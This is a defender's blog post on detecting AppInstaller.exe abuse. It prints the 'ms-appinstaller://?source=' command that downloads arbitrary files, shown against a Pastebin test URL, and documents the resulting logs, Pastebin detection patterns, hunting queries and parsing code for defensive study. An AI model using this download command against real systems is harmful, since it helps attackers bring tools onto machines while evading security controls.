Effective URL: https://detect.fyi/lolbas-detection-serie-1-appinstaller-exe-96971b9b1793?gi=515b3cbc3ee1

LOLBAS DETECTION SERIE [1] - APPINSTALLER.EXE

mthcht · Published in Detect FYI · 6 min read · Aug 21, 2023

The LOLBAS series: https://mthcht.medium.com/list/lolbas-843ba9de6810


WHAT IS APPINSTALLER?

AppInstaller is a utility that installs APPX and MSIX packages. It is leveraged
by numerous software vendors and plays a key role in software management.


WHAT IS LOLBAS?

Living Off The Land Binaries and Scripts

The goal of the LOLBAS project is to document every binary, script, and library
that can be used for Living Off The Land techniques.

Living Off The Land techniques refer to a set of tactics used by attackers to
exploit legitimate tools and processes already present on a system. By using
these built-in tools and features, they can carry out malicious activities
undetected by seamlessly blending in with legitimate traffic.

For the LOLBAS project a LOLBin/Lib/Script must:

 * Be a Microsoft-signed file, either native to the OS or downloaded from
   Microsoft.
 * Have extra “unexpected” functionality.
 * Have functionality that would be useful to an APT or red team.


LOL TECHNIQUE FOR APPINSTALLER.EXE

Ref LOLBAS: https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

notwhickey on Twitter found a way to download arbitrary files with
AppInstaller.exe using the following command:

start ms-appinstaller://?source=<url>

Using ‘?source=<url>’, the targeted file is downloaded to the system even if it
is not recognized as a valid package!

Categorized: T1105: Ingress Tool Transfer


TESTING AND DETECTION

Important Note: I have tried with multiple versions of Windows, and it will not
work on an updated system. This is because the ms-appinstaller protocol has been
disabled by Microsoft since it was abused by malware, with Emotet being one of
them:
https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/

I tested it on this Windows 10 Build version and it worked for me:



Let’s test the command suggested on the LOLBAS page:

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

This is the message shown by AppInstaller after execution (Invalid file
format):




WHAT IS HAPPENING BEHIND THE SCENES?

With Procmon running in the background, we can see these file creations:



Both AppInstaller.exe and taskhostw.exe created text files named after our file
in the Pastebin URL, ‘tdyShwLw[1].txt’, in the directory
‘C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\InetCache\<RANDOM-8-CHAR-DIRECTORY>’.
This behavior is consistent with what’s suggested on the LOLBAS page.

Additionally, an interesting file named ‘AILog.txt’ is created by
AppInstaller.exe in
C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\

 * Content of tdyShwLw[1].txt:



We find the string calc.exe in our text file, which corresponds to the content
of the Pastebin link we attempted to download
(https://pastebin.com/raw/tdyShwLw). Thus, even if the system doesn’t recognize
the targeted file as a valid format, the file is still written to disk!

 * Content of AILog.txt
   (C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt):

[Mon Aug 21 17:17:25 2023] Log File is located under: C:\Users\admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835277824]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750835343360]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890000384]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750890065920]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931222528]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814750931288064]
[Mon Aug 21 17:17:25 2023]{6064} ConvertVersionToUINT64(String) -> Version [2814751004164096]
[Mon Aug 21 17:17:25 2023]{6064} App::OnActivated: Activated via other means (protocol/protocol for results/toast notification)
[Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract.
[Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} Setting launch intent to MSAPPINSTALLER_INSTALL
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Toast Notification Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Checking if Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} RegisterBackgroundTask -> Installation Background Task is already registered.
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> WindowButtonsPresentState
[Mon Aug 21 17:17:25 2023]{6064} GoToState -> LoadingState
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} GetIsMSIXBundleExtensionSupported -> True
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo->CreateAsync, URI: [https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} AppsInfo, File Type: [Package]
[Mon Aug 21 17:17:25 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:25 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating package info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [Bundle]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerUri constructor, URI: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} AppPackageInfo::CreateAsync -> Populating bundle info
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
[Mon Aug 21 17:17:26 2023]{6064} AppsInfo, File Type: [AppInstaller]
[Mon Aug 21 17:17:26 2023]{6064} AppDataSource::CreateAsync
[Mon Aug 21 17:17:26 2023]{6064} AppInstaller XML content:
calc.exe
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerExtension::LoadXmlFromSourceAsync -> Error: 0xc00ce556
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x80073aa0]
[Mon Aug 21 17:17:26 2023]{6064} AppInstallerException -> Error Resource ID: [invalidFile]
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> LoadedState
[Mon Aug 21 17:17:26 2023]{6064} GoToState -> DisplayAppsInfoErrorState

This is a nice DFIR artefact that can be collected to detect the usage of this
LOLBin: the full URL argument (https://pastebin.com/raw/tdyShwLw) is recorded in
this log!

With Sysmon Event ID 22, I can see AppInstaller.exe making a DNS request to
pastebin.com:

Log Name:      Microsoft-Windows-Sysmon/Operational
Source:        Microsoft-Windows-Sysmon
Date:          8/21/2023 5:17:25 PM
Event ID:      22
Task Category: Dns query (rule: DnsQuery)
Level:         Information
Keywords:      
User:          Système
Computer:      DESKTOP-GI9JDDB
Description:
Dns query:
RuleName: 
UtcTime: 2023-08-21 17:17:25.056
ProcessGuid: {ba956c93-8574-64e3-0000-00105a40cb00}
ProcessId: 5276
QueryName: pastebin.com
QueryStatus: 0
QueryResults: ::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;
Image: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
    <EventID>22</EventID>
    <Version>5</Version>
    <Level>4</Level>
    <Task>22</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2023-08-21T17:17:25.008082800Z" />
    <EventRecordID>1478857</EventRecordID>
    <Correlation />
    <Execution ProcessID="2684" ThreadID="3788" />
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>DESKTOP-GI9JDDB</Computer>
    <Security UserID="S-1-5-18" />
  </System>
  <EventData>
    <Data Name="RuleName">
    </Data>
    <Data Name="UtcTime">2023-08-21 17:17:25.056</Data>
    <Data Name="ProcessGuid">{ba956c93-8574-64e3-0000-00105a40cb00}</Data>
    <Data Name="ProcessId">5276</Data>
    <Data Name="QueryName">pastebin.com</Data>
    <Data Name="QueryStatus">0</Data>
    <Data Name="QueryResults">::ffff:104.20.68.143;::ffff:104.20.67.143;::ffff:172.67.34.170;</Data>
    <Data Name="Image">C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\AppInstaller.exe</Data>
  </EventData>
</Event>

What is unexpected is that I cannot see the command line in process execution
logs (Event ID 1, 3, 4688…):

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

I am not sure why it’s not logged; it seems to be a specific behavior of
protocol handlers…

But since the ms-appinstaller protocol was disabled by Microsoft 2 years ago,
for detection we can rely on the Sigma rule proposed in the LOLBAS project:
AppInstaller.exe making a DNS query. To get the full URL requested, we should
see it in our proxy logs (or collect the log file
*:\Users\*\AppData\Local\Packages\Microsoft.DesktopAppInstaller_*\TempState\AILog.txt
from the endpoints)!

For this example using Pastebin for data collection, I recommend these
detection patterns for Pastebin requests in your proxy logs (ref):

Raw content access with Pastebin in the url field:

 * http*//pastebin.com*/raw/*
 * http*//pastebin.com*/rw/*

More details on pastebin detections:
https://detect.fyi/how-threat-actors-use-pastebin-69a78c149ccf
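As an added example (not part of the original article), the following Python parses AILog.txt lines of the form shown above, extracts every distinct `source:` URL with its first timestamp, and checks each URL against the two Pastebin raw-access patterns. The sample lines are copied from the AILog.txt excerpt above; the function names are my own.

```python
import re
from fnmatch import fnmatch

# Sample input: lines taken from the AILog.txt excerpt in the article.
SAMPLE_AILOG = """\
[Mon Aug 21 17:17:25 2023]{6064} Activated with Protocol contract.
[Mon Aug 21 17:17:25 2023]{6064} Argument is a Uri: [ms-appinstaller:///?source=https://pastebin.com/raw/tdyShwLw]
[Mon Aug 21 17:17:25 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} Parsed AppInstaller URI: source: [https://pastebin.com/raw/tdyShwLw], activationUri: [N/A], checkForUdpates: [N/A]
[Mon Aug 21 17:17:26 2023]{6064} ERROR: AppsInfo -> Error: [0x8051100f]
"""

# Proxy-log wildcard patterns for Pastebin raw access, as given in the article.
PASTEBIN_RAW_PATTERNS = ("http*//pastebin.com*/raw/*", "http*//pastebin.com*/rw/*")

# "[timestamp]{thread id} Parsed AppInstaller URI: source: [url], ..."
PARSED_URI = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\{(?P<tid>\d+)\} Parsed AppInstaller URI: source: \[(?P<source>[^\]]*)\]"
)


def extract_sources(ailog_text):
    """Return one (first_timestamp, source_url) pair per distinct source URL."""
    seen = {}  # insertion order keeps the first sighting of each URL
    for line in ailog_text.splitlines():
        m = PARSED_URI.match(line)
        if m and m.group("source") not in seen:
            seen[m.group("source")] = m.group("ts")
    return [(ts, url) for url, ts in seen.items()]


def matches_pastebin_raw(url):
    """True if the URL hits one of the Pastebin raw-access patterns."""
    return any(fnmatch(url.lower(), pattern) for pattern in PASTEBIN_RAW_PATTERNS)


def triage(ailog_text):
    """Flag every source URL seen in AILog.txt, marking Pastebin raw hits."""
    return [
        {"time": ts, "source": url, "pastebin_raw": matches_pastebin_raw(url)}
        for ts, url in extract_sources(ailog_text)
    ]


if __name__ == "__main__":
    for hit in triage(SAMPLE_AILOG):
        print(hit)
```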


RELEVANT HUNTING SEARCHES:

DNS Queries (to correlate with the logs from AILog.txt)

`mysysmonlogs` 
  process_path="C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_*\\AppInstaller.exe"
  signature_id=22

Now for the command line (even if I did not see it), it could appear in a
script or be combined with other commands and logged in process execution:

(`scriptcontentblocklogs` OR (`mysysmonlogs` signature_id=1))
  process_command="*start ms-appinstaller://?source=http*" 
  OR scriptcontent="*start ms-appinstaller://?source=http*"

Lookup Table entries:



(change with your own field mapping)
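An added example, not from the article, that applies the two hunting searches above to Sysmon event XML: Event ID 22 with the AppInstaller.exe image path, and Event ID 1 with the `start ms-appinstaller://?source=http*` command line. The first sample record is the article's Event ID 22 event trimmed to the fields used; the second is a constructed Event ID 1 record; the function names are assumptions.

```python
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Wildcards from the two hunting searches in the article. Note that fnmatch's
# "?" is a single-character wildcard, so it still matches the literal "?" here.
APPINSTALLER_IMAGE = r"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_*\AppInstaller.exe"
APPINSTALLER_CMDLINE = "*start ms-appinstaller://?source=http*"

# Constructed sample: the article's Event ID 22 record (trimmed) and a
# hypothetical Event ID 1 record carrying the command line.
SAMPLE_EVENTS = [
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>22</EventID>
    <Computer>DESKTOP-GI9JDDB</Computer></System><EventData><Data Name="UtcTime">2023-08-21 17:17:25.056</Data>
    <Data Name="QueryName">pastebin.com</Data>
    <Data Name="Image">C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe\\AppInstaller.exe</Data>
    </EventData></Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>1</EventID>
    <Computer>DESKTOP-GI9JDDB</Computer></System><EventData><Data Name="UtcTime">2023-08-21 17:17:24.900</Data>
    <Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
    <Data Name="CommandLine">cmd.exe /c start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw</Data>
    </EventData></Event>""",
]


def parse_event(xml_text):
    """Flatten a Sysmon Event XML record into a dict of EventData fields."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    fields["EventID"] = int(root.findtext("e:System/e:EventID", namespaces=NS))
    fields["Computer"] = root.findtext("e:System/e:Computer", namespaces=NS)
    return fields


def hunt(events_xml):
    """Return (rule, UtcTime, detail) for every record matching either search."""
    alerts = []
    for ev in map(parse_event, events_xml):
        if ev["EventID"] == 22 and fnmatchcase(ev.get("Image", ""), APPINSTALLER_IMAGE):
            alerts.append(("appinstaller_dns", ev["UtcTime"], ev["QueryName"]))
        elif ev["EventID"] == 1 and fnmatchcase(ev.get("CommandLine", ""), APPINSTALLER_CMDLINE):
            alerts.append(("appinstaller_cmdline", ev["UtcTime"], ev["CommandLine"]))
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```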

Moving on to the next LOLBAS !
